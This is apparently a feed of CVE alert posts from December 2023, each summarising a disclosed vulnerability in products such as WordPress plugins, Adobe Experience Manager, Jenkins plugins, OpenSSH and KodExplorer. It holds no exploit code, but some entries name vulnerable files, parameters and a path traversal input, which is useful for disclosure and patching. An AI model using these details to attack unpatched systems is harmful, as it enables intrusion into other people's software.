🚨 CVE-2023-49155Cross-Site Request Forgery (CSRF) vulnerability in Wow-Company Button Generator – easily Button Builder.This issue affects Button Generator – easily Button Builder: from n/a through 2.3.8.🎖@cveNotify |
|
| 2023-12-18 23:24:37 |
🚨 CVE-2023-49153Cross-Site Request Forgery (CSRF) vulnerability in Saiful Islam Add to Cart Text Changer and Customize Button, Add Custom Icon.This issue affects Add to Cart Text Changer and Customize Button, Add Custom Icon: from n/a through 2.0.🎖@cveNotify |
|
| 2023-12-18 23:24:33 |
🚨 CVE-2023-47530Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WPVibes Redirect 404 Error Page to Homepage or Custom Page with Logs allows SQL Injection.This issue affects Redirect 404 Error Page to Homepage or Custom Page with Logs: from n/a through 1.8.7.🎖@cveNotify |
|
| 2023-12-18 23:24:32 |
🚨 CVE-2023-33331Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WooCommerce Product Vendors allows SQL Injection.This issue affects Product Vendors: from n/a through 2.1.76.🎖@cveNotify |
|
| 2023-12-18 22:24:45 |
🚨 CVE-2023-48773Cross-Site Request Forgery (CSRF) vulnerability in WP Doctor WooCommerce Login Redirect.This issue affects WooCommerce Login Redirect: from n/a through 2.2.4.🎖@cveNotify |
|
| 2023-12-18 22:24:38 |
🚨 CVE-2023-46686A reliance on untrusted inputs in a security decision could be exploited by a privileged user to configure the Gallagher Command Centre Diagnostics Service to use less secure communication protocols. This issue affects: Gallagher Diagnostics Service prior to v1.3.0 (distributed in 9.00.1507(MR1)).🎖@cveNotify |
|
| 2023-12-18 22:24:37 |
🚨 CVE-2023-41967Sensitive information uncleared after debug/power state transition in the Controller 6000 could be abused by an attacker with knowledge of the Controller's default diagnostic password and physical access to the Controller to view its configuration through the diagnostic web pages. This issue affects: Gallagher Controller 6000 8.70 prior to vCR8.70.231204a (distributed in 8.70.2375 (MR5)), v8.60 or earlier.🎖@cveNotify |
|
| 2023-12-18 22:24:33 |
🚨 CVE-2023-23584An observable response discrepancy in the Gallagher Command Centre RESTAPI allows an insufficiently-privileged user to infer the presence of items that would not otherwise be viewable. This issue affects: Gallagher Command Centre 8.70 prior to vEL8.70.1787 (MR2), 8.60 prior to vEL8.60.2039 (MR4), all version of 8.50 and prior.🎖@cveNotify |
|
| 2023-12-18 22:24:32 |
🚨 CVE-2023-22439Improper input validation of a large HTTP request in the Controller 6000 and Controller 7000 optional diagnostic web interface (Port 80) can be used to perform a Denial of Service of the diagnostic web interface.This issue affects: Gallagher Controller 6000 and 7000 8.90 prior to vCR8.90.231204a (distributed in 8.90.1620 (MR2)), 8.80 prior to vCR8.80.231204a (distributed in 8.80.1369 (MR3)), 8.70 prior to vCR8.70.231204a (distributed in 8.70.2375 (MR5)), 8.60 prior to vCR8.60.231116a (distributed in 8.60.2550 (MR7)), all versions of 8.50 and prior.🎖@cveNotify |
|
| 2023-12-18 21:24:32 |
🚨 CVE-2023-48795The SSH transport protocol with certain OpenSSH extensions, found in OpenSSH before 9.6 and other products, allows remote attackers to bypass integrity checks such that some packets are omitted (from the extension negotiation message), and a client and server may consequently end up with a connection for which some security features have been downgraded or disabled, aka a Terrapin attack. This occurs because the SSH Binary Packet Protocol (BPP), implemented by these extensions, mishandles the handshake phase and mishandles use of sequence numbers. For example, there is an effective attack against SSH's use of ChaCha20-Poly1305 (and CBC with Encrypt-then-MAC). The bypass occurs in chacha20-poly1305@openssh.com and (if CBC is used) the -etm@openssh.com MAC algorithms. This also affects Maverick Synergy Java SSH API before 3.1.0-SNAPSHOT, Dropbear through 2022.83, Ssh before 5.1.1 in Erlang/OTP, PuTTY before 0.80, AsyncSSH before 2.14.2, golang.org/x/crypto before 0.17.0, and libssh before 0.10.6; and there could be effects on Bitvise SSH through 9.31.🎖@cveNotify |
|
| 2023-12-18 20:54:45 |
🚨 CVE-2023-48521Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2023-12-18 20:54:39 |
🚨 CVE-2023-48520Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2023-12-18 20:54:38 |
🚨 CVE-2023-48517Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2023-12-18 20:54:37 |
🚨 CVE-2023-48516Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2023-12-18 20:54:33 |
🚨 CVE-2023-48514Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2023-12-18 20:54:32 |
🚨 CVE-2023-48511Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2023-12-18 20:24:51 |
🚨 CVE-2023-50371Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Page Visit Counter Advanced Page Visit Counter – Most Wanted Analytics Plugin for WordPress allows Stored XSS.This issue affects Advanced Page Visit Counter – Most Wanted Analytics Plugin for WordPress: from n/a through 8.0.6.🎖@cveNotify |
|
| 2023-12-18 20:24:44 |
🚨 CVE-2023-46750URL Redirection to Untrusted Site ('Open Redirect') vulnerability when "form" authentication is used in Apache Shiro.Mitigation: Update to Apache Shiro 1.13.0+ or 2.0.0-alpha-4+.🎖@cveNotify |
|
| 2023-12-18 20:24:43 |
🚨 CVE-2023-40628A reflected XSS vulnerability was discovered in the Extplorer component for Joomla.🎖@cveNotify |
|
| 2023-12-18 20:24:39 |
🚨 CVE-2023-40627A reflected XSS vulnerability was discovered in the LivingWord component for Joomla.🎖@cveNotify |
|
| 2023-12-18 20:24:38 |
🚨 CVE-2023-50248CKAN is an open-source data management system for powering data hubs and data portals. Starting in version 2.0.0 and prior to versions 2.9.10 and 2.10.3, when submitting a POST request to the `/dataset/new` endpoint (including either the auth cookie or the `Authorization` header) with a specially-crafted field, an attacker can create an out-of-memory error in the hosting server. To trigger this error, the attacker need to have permissions to create or edit datasets. This vulnerability has been patched in CKAN 2.10.3 and 2.9.10.🎖@cveNotify |
|
| 2023-12-18 20:24:33 |
🚨 CVE-2023-6381Improper input validation vulnerability in Newsletter Software SuperMailer affecting version 11.20.0.2204. An attacker could exploit this vulnerability by sending a malicious configuration file (file with SMB extension) to a user via a link or email attachment and persuade the user to open the file with the affected software on the local system. A successful exploit could allow the attacker to crash the application when attempting to load the malicious file.🎖@cveNotify |
|
| 2023-12-18 20:24:32 |
🚨 CVE-2023-49581SAP GUI for Windows and SAP GUI for Java allow an unauthenticated attacker to access information which would otherwise be restricted and confidential. In addition, this vulnerability allows the unauthenticated attacker to write data to a database table. By doing so the attacker could increase response times of the AS ABAP, leading to mild impact on availability.🎖@cveNotify |
|
| 2023-12-18 19:54:56 |
🚨 CVE-2023-49813Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in J.N. Breetvelt a.K.A. OpaJaap WP Photo Album Plus allows Stored XSS.This issue affects WP Photo Album Plus: from n/a through 8.5.02.005.🎖@cveNotify |
|
| 2023-12-18 19:54:49 |
🚨 CVE-2023-49195Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kyle Phillips Nested Pages allows Stored XSS.This issue affects Nested Pages: from n/a through 3.2.6.🎖@cveNotify |
|
| 2023-12-18 19:24:51 |
🚨 CVE-2023-46727GLPI is a free asset and IT management software package. Starting in version 10.0.0 and prior to version 10.0.11, GLPI inventory endpoint can be used to drive a SQL injection attack. Version 10.0.11 contains a patch for the issue. As a workaround, disable native inventory.🎖@cveNotify |
|
| 2023-12-18 19:24:45 |
🚨 CVE-2023-46726GLPI is a free asset and IT management software package. Starting in version 10.0.0 and prior to version 10.0.11, on PHP 7.4 only, the LDAP server configuration form can be used to execute arbitrary code previously uploaded as a GLPI document. Version 10.0.11 contains a patch for the issue.🎖@cveNotify |
|
| 2023-12-18 19:24:44 |
🚨 CVE-2023-6766A vulnerability classified as problematic has been found in PHPGurukul Teacher Subject Allocation Management System 1.0. Affected is an unknown function of the file /admin/course.php of the component Delete Course Handler. The manipulation of the argument delid leads to cross-site request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-247896.🎖@cveNotify |
|
| 2023-12-18 19:24:43 |
🚨 CVE-2023-6765A vulnerability was found in SourceCodester Online Tours & Travels Management System 1.0. It has been rated as critical. This issue affects the function prepare of the file email_setup.php. The manipulation of the argument name leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-247895.🎖@cveNotify |
|
| 2023-12-18 19:24:39 |
🚨 CVE-2023-50778A cross-site request forgery (CSRF) vulnerability in Jenkins PaaSLane Estimate Plugin 1.0.4 and earlier allows attackers to connect to an attacker-specified URL using an attacker-specified token.🎖@cveNotify |
|
| 2023-12-18 19:24:38 |
🚨 CVE-2023-50775A cross-site request forgery (CSRF) vulnerability in Jenkins Deployment Dashboard Plugin 1.0.10 and earlier allows attackers to copy jobs.🎖@cveNotify |
|
| 2023-12-18 19:24:33 |
🚨 CVE-2023-47325Silverpeas Core 6.3.1 administrative "Bin" feature is affected by broken access control. A user with low privileges is able to navigate directly to the bin, revealing all deleted spaces. The user can then restore or permanently delete the spaces.🎖@cveNotify |
|
| 2023-12-18 19:24:32 |
🚨 CVE-2023-34064Workspace ONE Launcher contains a Privilege Escalation Vulnerability. A malicious actor with physical access to Workspace ONE Launcher could utilize the Edge Panel feature to bypass setup to gain access to sensitive information.🎖@cveNotify |
|
| 2023-12-18 18:54:43 |
🚨 CVE-2023-48639Adobe Substance 3D Designer versions 13.0.0 (and earlier) and 13.1.0 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-12-18 18:54:39 |
🚨 CVE-2023-48638Adobe Substance 3D Designer versions 13.0.0 (and earlier) and 13.1.0 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-12-18 18:54:38 |
🚨 CVE-2023-48636Adobe Substance 3D Designer versions 13.0.0 (and earlier) and 13.1.0 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-12-18 18:24:45 |
🚨 CVE-2023-49836Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Brontobytes Cookie Bar allows Stored XSS.This issue affects Cookie Bar: from n/a through 2.0.🎖@cveNotify |
|
| 2023-12-18 18:24:38 |
🚨 CVE-2023-50768A cross-site request forgery (CSRF) vulnerability in Jenkins Nexus Platform Plugin 3.18.0-03 and earlier allows attackers to connect to an attacker-specified HTTP server using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.🎖@cveNotify |
|
| 2023-12-18 18:24:37 |
🚨 CVE-2023-50767Missing permission checks in Jenkins Nexus Platform Plugin 3.18.0-03 and earlier allow attackers with Overall/Read permission to send an HTTP request to an attacker-specified URL and parse the response as XML.🎖@cveNotify |
|
| 2023-12-18 18:24:33 |
🚨 CVE-2023-50765A missing permission check in Jenkins Scriptler Plugin 342.v6a_89fd40f466 and earlier allows attackers with Overall/Read permission to read the contents of a Groovy script by knowing its ID.🎖@cveNotify |
|
| 2023-12-18 18:24:32 |
🚨 CVE-2023-50263Nautobot is a Network Source of Truth and Network Automation Platform built as a web application atop the Django Python framework with a PostgreSQL or MySQL database. In Nautobot 1.x and 2.0.x prior to 1.6.7 and 2.0.6, the URLs `/files/get/?name=...` and `/files/download/?name=...` are used to provide admin access to files that have been uploaded as part of a run request for a Job that has FileVar inputs. Under normal operation these files are ephemeral and are deleted once the Job in question runs. In the default implementation used in Nautobot, as provided by `django-db-file-storage`, these URLs do not by default require any user authentication to access; they should instead be restricted to only users who have permissions to view Nautobot's `FileProxy` model instances.Note that no URL mechanism is provided for listing or traversal of the available file `name` values, so in practice an unauthenticated user would have to guess names to discover arbitrary files for download, but if a user knows the file name/path value, they can access it without authenticating, so we are considering this a vulnerability.Fixes are included in Nautobot 1.6.7 and Nautobot 2.0.6. No known workarounds are available other than applying the patches included in those versions.🎖@cveNotify |
|
| 2023-12-18 18:08:28 |
https://t.me/malwr |
|
| 2023-12-18 17:54:39 |
🚨 CVE-2023-6722A path traversal vulnerability has been detected in Repox, which allows an attacker to read arbitrary files on the running server, resulting in a disclosure of sensitive information. An attacker could access files such as application code or data, backend credentials, operating system files...🎖@cveNotify |
|
| 2023-12-18 17:54:38 |
🚨 CVE-2023-6719An XSS vulnerability has been detected in Repox, which allows an attacker to compromise interactions between a user and the vulnerable application, and can be exploited by a third party by sending a specially crafted JavaScript payload to a user, and thus gain full control of their session.🎖@cveNotify |
|
| 2023-12-18 17:54:37 |
🚨 CVE-2023-6718An authentication bypass vulnerability has been found in Repox, which allows a remote user to send a specially crafted POST request, due to the lack of any authentication method, resulting in the alteration or creation of users.🎖@cveNotify |
|
| 2023-12-18 17:54:33 |
🚨 CVE-2023-44251** UNSUPPORTED WHEN ASSIGNED **A improper limitation of a pathname to a restricted directory ('path traversal') vulnerability [CWE-22] in Fortinet FortiWAN version 5.2.0 through 5.2.1 and version 5.1.1. through 5.1.2 may allow an authenticated attacker to read and delete arbitrary file of the system via crafted HTTP or HTTPs requests.🎖@cveNotify |
|
| 2023-12-18 17:54:32 |
🚨 CVE-2023-31210Usage of user controlled LD_LIBRARY_PATH in agent in Checkmk 2.2.0p10 up to 2.2.0p16 allows malicious Checkmk site user to escalate rights via injection of malicious libraries🎖@cveNotify |
|
| 2023-12-18 16:54:32 |
🚨 CVE-2023-50773Jenkins Dingding JSON Pusher Plugin 2.0 and earlier does not mask access tokens displayed on the job configuration form, increasing the potential for attackers to observe and capture them.🎖@cveNotify |
|
| 2023-12-18 16:24:39 |
🚨 CVE-2023-48755Cross-Site Request Forgery (CSRF) vulnerability in Michael Winkler teachPress.This issue affects teachPress: from n/a through 9.0.4.🎖@cveNotify |
|
| 2023-12-18 16:24:38 |
🚨 CVE-2023-47789Cross-Site Request Forgery (CSRF) vulnerability in WooCommerce Canada Post Shipping Method.This issue affects Canada Post Shipping Method: from n/a through 2.8.3.🎖@cveNotify |
|
| 2023-12-18 16:24:33 |
🚨 CVE-2023-33214Cross-Site Request Forgery (CSRF) vulnerability in Tagbox Tagbox – UGC Galleries, Social Media Widgets, User Reviews & Analytics.This issue affects Tagbox – UGC Galleries, Social Media Widgets, User Reviews & Analytics: from n/a through 3.1.🎖@cveNotify |
|
| 2023-12-18 16:24:32 |
🚨 CVE-2023-46445An issue in AsyncSSH before 2.14.1 allows attackers to control the extension info message (RFC 8308) via a man-in-the-middle attack, aka a "Rogue Extension Negotiation."🎖@cveNotify |
|
| 2023-12-18 00:24:41 |
🚨 CVE-2023-50976Redpanda before 23.1.21 and 23.2.x before 23.2.18 has missing authorization checks in the Transactions API.🎖@cveNotify |
|
| 2023-12-17 23:24:32 |
🚨 CVE-2023-3907A privilege escalation vulnerability in GitLab EE affecting all versions from 16.0 prior to 16.4.4, 16.5 prior to 16.5.4, and 16.6 prior to 16.6.2 allows a project Maintainer to use a Project Access Token to escalate their role to Owner🎖@cveNotify |
|
| 2023-12-17 20:24:32 |
🚨 CVE-2023-6377A flaw was found in xorg-server. Querying or changing XKB button actions such as moving from a touchpad to a mouse can result in out-of-bounds memory reads and writes. This may allow local privilege escalation or possible remote code execution in cases where X11 forwarding is involved.🎖@cveNotify |
|
| 2023-12-17 16:24:32 |
🚨 CVE-2023-6902A vulnerability has been found in codelyfe Stupid Simple CMS up to 1.2.4 and classified as critical. This vulnerability affects unknown code of the file /file-manager/upload.php. The manipulation of the argument file leads to unrestricted upload. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248260.🎖@cveNotify |
|
| 2023-12-17 15:24:32 |
🚨 CVE-2023-50271A potential security vulnerability has been identified with HP-UX System Management Homepage (SMH). This vulnerability could be exploited locally or remotely to disclose information.🎖@cveNotify |
|
| 2023-12-17 14:24:32 |
🚨 CVE-2023-6900A vulnerability, which was classified as critical, has been found in rmountjoy92 DashMachine 0.5-4. Affected by this issue is some unknown functionality of the file /settings/delete_file. The manipulation of the argument file leads to path traversal: '../filedir'. The exploit has been disclosed to the public and may be used. VDB-248258 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-17 13:24:32 |
🚨 CVE-2023-6899A vulnerability classified as problematic was found in rmountjoy92 DashMachine 0.5-4. Affected by this vulnerability is an unknown functionality of the file /settings/save_config of the component Config Handler. The manipulation of the argument value_template leads to code injection. The exploit has been disclosed to the public and may be used. The identifier VDB-248257 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-17 11:24:33 |
🚨 CVE-2023-6898A vulnerability classified as critical has been found in SourceCodester Best Courier Management System 1.0. Affected is an unknown function of the file manage_user.php. The manipulation of the argument id leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248256.🎖@cveNotify |
|
| 2023-12-17 11:24:32 |
🚨 CVE-2023-49816Cross-Site Request Forgery (CSRF) vulnerability in Innovative Solutions Fix My Feed RSS Repair.This issue affects Fix My Feed RSS Repair: from n/a through 1.4.🎖@cveNotify |
|
| 2023-12-17 10:24:33 |
🚨 CVE-2023-49775Cross-Site Request Forgery (CSRF) vulnerability in Denis Kobozev CSV Importer.This issue affects CSV Importer: from n/a through 0.3.8.🎖@cveNotify |
|
| 2023-12-17 10:24:32 |
🚨 CVE-2023-24380Cross-Site Request Forgery (CSRF) vulnerability in Webbjocke Simple Wp Sitemap.This issue affects Simple Wp Sitemap: from n/a through 1.2.1.🎖@cveNotify |
|
| 2023-12-17 08:24:32 |
🚨 CVE-2023-6894A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been classified as problematic. This affects an unknown part of the file access/html/system.html of the component Log File Handler. The manipulation leads to information disclosure. The exploit has been disclosed to the public and may be used. The identifier VDB-248253 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-12-17 07:24:32 |
🚨 CVE-2023-6893A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK) and classified as problematic. Affected by this issue is some unknown functionality of the file /php/exportrecord.php. The manipulation of the argument downname with the input C:\ICPAS\Wnmp\WWW\php\conversion.php leads to path traversal. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248252. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-12-17 04:24:32 |
🚨 CVE-2023-6891A vulnerability has been found in PeaZip 9.4.0 and classified as problematic. Affected by this vulnerability is an unknown functionality in the library dragdropfilesdll.dll of the component Library Handler. The manipulation leads to uncontrolled search path. An attack has to be approached locally. Upgrading to version 9.6.0 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-248251. NOTE: Vendor was contacted early, confirmed the existence of the flaw and immediately worked on a patched release.🎖@cveNotify |
|
| 2023-12-17 03:24:32 |
🚨 CVE-2023-46246Vim is an improved version of the good old UNIX editor Vi. Heap-use-after-free in memory allocated in the function `ga_grow_inner` in in the file `src/alloc.c` at line 748, which is freed in the file `src/ex_docmd.c` in the function `do_cmdline` at line 1010 and then used again in `src/cmdhist.c` at line 759. When using the `:history` command, it's possible that the provided argument overflows the accepted value. Causing an Integer Overflow and potentially later an use-after-free. This vulnerability has been patched in version 9.0.2068.🎖@cveNotify |
|
| 2023-12-17 02:24:32 |
🚨 CVE-2023-50965In MicroHttpServer (aka Micro HTTP Server) through 4398570, _ReadStaticFiles in lib/middleware.c allows a stack-based buffer overflow and potentially remote code execution via a long URI.🎖@cveNotify |
|
| 2023-12-17 01:24:32 |
🚨 CVE-2023-6886A vulnerability was found in xnx3 wangmarket 6.1. It has been rated as critical. Affected by this issue is some unknown functionality of the component Role Management Page. The manipulation leads to code injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248246 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-16 23:24:32 |
🚨 CVE-2023-45853MiniZip in zlib through 1.3 has an integer overflow and resultant heap-based buffer overflow in zipOpenNewFileInZip4_64 via a long filename, comment, or extra field. NOTE: MiniZip is not a supported part of the zlib product. NOTE: pyminizip through 0.2.6 is also vulnerable because it bundles an affected zlib version, and exposes the applicable MiniZip code through its compress API.🎖@cveNotify |
|
| 2023-12-16 20:24:32 |
🚨 CVE-2023-23583Sequence of processor instructions leads to unexpected behavior for some Intel(R) Processors may allow an authenticated user to potentially enable escalation of privilege and/or information disclosure and/or denial of service via local access.🎖@cveNotify |
|
| 2023-12-16 13:24:32 |
🚨 CVE-2023-6559The MW WP Form plugin for WordPress is vulnerable to arbitrary file deletion in all versions up to, and including, 5.0.3. This is due to the plugin not properly validating the path of an uploaded file prior to deleting it. This makes it possible for unauthenticated attackers to delete arbitrary files, including the wp-config.php file, which can make site takeover and remote code execution possible.🎖@cveNotify |
|
| 2023-12-16 12:24:32 |
🚨 CVE-2023-6852A vulnerability classified as critical has been found in kalcaddle KodExplorer up to 4.51.03. Affected is an unknown function of the file plugins/webodf/app.php. The manipulation leads to server-side request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The name of the patch is 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248220.🎖@cveNotify |
|
| 2023-12-16 11:24:32 |
🚨 CVE-2023-6851A vulnerability was found in kalcaddle KodExplorer up to 4.51.03. It has been rated as critical. This issue affects the function unzipList of the file plugins/zipView/app.php of the component ZIP Archive Handler. The manipulation leads to code injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The patch is named 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-248219.🎖@cveNotify |
|
| 2023-12-16 09:24:32 |
🚨 CVE-2023-6850A vulnerability was found in kalcaddle KodExplorer up to 4.51.03. It has been declared as critical. This vulnerability affects unknown code of the file /index.php?pluginApp/to/yzOffice/getFile of the component API Endpoint Handler. The manipulation of the argument path/file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The patch is identified as 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. VDB-248218 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-16 08:24:32 |
🚨 CVE-2023-6849A vulnerability was found in kalcaddle kodbox up to 1.48. It has been rated as critical. Affected by this issue is the function cover of the file plugins/fileThumb/app.php. The manipulation of the argument path leads to server-side request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.48.04 is able to address this issue. The patch is identified as 63a4d5708d210f119c24afd941d01a943e25334c. It is recommended to upgrade the affected component. VDB-248210 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-16 07:24:32 |
🚨 CVE-2023-6848A vulnerability was found in kalcaddle kodbox up to 1.48. It has been declared as critical. Affected by this vulnerability is the function check of the file plugins/officeViewer/controller/libreOffice/index.class.php. The manipulation of the argument soffice leads to command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.48.04 is able to address this issue. The identifier of the patch is 63a4d5708d210f119c24afd941d01a943e25334c. It is recommended to upgrade the affected component. The identifier VDB-248209 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-16 04:54:40 |
🚨 CVE-2023-5019A vulnerability classified as critical was found in Tongda OA. This vulnerability affects unknown code of the file general/hr/manage/staff_reinstatement/delete.php. The manipulation of the argument REINSTATEMENT_ID leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-239860.🎖@cveNotify |
|
| 2023-12-16 04:54:33 |
🚨 CVE-2023-2738A vulnerability classified as critical has been found in Tongda OA 11.10. This affects the function actionGetdata of the file GatewayController.php. The manipulation leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-229149 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-12-16 04:54:32 |
🚨 CVE-2022-23902Tongda2000 v11.10 was discovered to contain a SQL injection vulnerability in export_data.php via the d_name parameter.🎖@cveNotify |
|
| 2023-12-16 01:54:51 |
🚨 CVE-2023-50137JFinalcms 5.0.0 is vulnerable to Cross Site Scripting (XSS) in the site management office.🎖@cveNotify |
|
| 2023-12-16 01:54:44 |
🚨 CVE-2023-6761A vulnerability, which was classified as problematic, has been found in Thecosy IceCMS up to 2.0.1. This issue affects some unknown processing of the component User Data Handler. The manipulation leads to improper access controls. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247889 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-16 01:54:43 |
🚨 CVE-2023-6758A vulnerability was found in Thecosy IceCMS 2.0.1. It has been rated as critical. Affected by this issue is some unknown functionality of the file /adplanet/PlanetCommentList of the component API. The manipulation leads to improper access controls. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-247886 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-16 01:54:39 |
🚨 CVE-2023-48634Adobe After Effects versions 24.0.3 (and earlier) and 23.6.0 (and earlier) are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-12-16 01:54:38 |
🚨 CVE-2023-48630Adobe Substance 3D Sampler versions 4.2.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-12-16 01:54:33 |
🚨 CVE-2023-48627Adobe Substance 3D Sampler versions 4.2.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-12-16 01:54:32 |
🚨 CVE-2023-48625Adobe Substance 3D Sampler versions 4.2.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-12-16 01:24:45 |
🚨 CVE-2023-48581Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2023-12-16 01:24:39 |
🚨 CVE-2023-48580Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2023-12-16 01:24:38 |
🚨 CVE-2023-50100JFinalcms 5.0.0 is vulnerable to Cross Site Scripting (XSS) via carousel image editing.🎖@cveNotify |
|
| 2023-12-16 01:24:37 |
🚨 CVE-2023-50268jq is a command-line JSON processor. Version 1.7 is vulnerable to stack-based buffer overflow in builds using decNumber. Version 1.7.1 contains a patch for this issue.🎖@cveNotify |
|
| 2023-12-16 01:24:34 |
🚨 CVE-2023-5058Improper Input Validation in the processing of user-supplied splash screen during system boot in Phoenix SecureCore™ Technology™ 4 potentially allows denial-of-service attacks or arbitrary code execution.🎖@cveNotify |
|
| 2023-12-16 01:24:33 |
🚨 CVE-2023-40238A LogoFAIL issue was discovered in BmpDecoderDxe in Insyde InsydeH2O with kernel 5.2 before 05.28.47, 5.3 before 05.37.47, 5.4 before 05.45.47, 5.5 before 05.53.47, and 5.6 before 05.60.47 for certain Lenovo devices. Image parsing of crafted BMP logo files can copy data to a specific address during the DXE phase of UEFI execution. This occurs because of an integer signedness error involving PixelHeight and PixelWidth during RLE4/RLE8 compression.🎖@cveNotify |
|
| 2023-12-16 01:24:32 |
